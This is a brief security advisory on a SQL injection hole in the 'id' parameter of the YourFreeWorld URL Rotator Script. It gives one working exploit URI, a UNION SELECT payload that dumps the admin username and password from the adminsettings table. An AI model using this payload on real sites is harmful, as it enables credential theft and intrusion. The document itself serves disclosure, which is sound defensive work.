YourFreeWorld URL Rotator Script 'id' Parameter SQL Injection Vulnerability

YourFreeWorld URL Rotator Script 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com.com/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--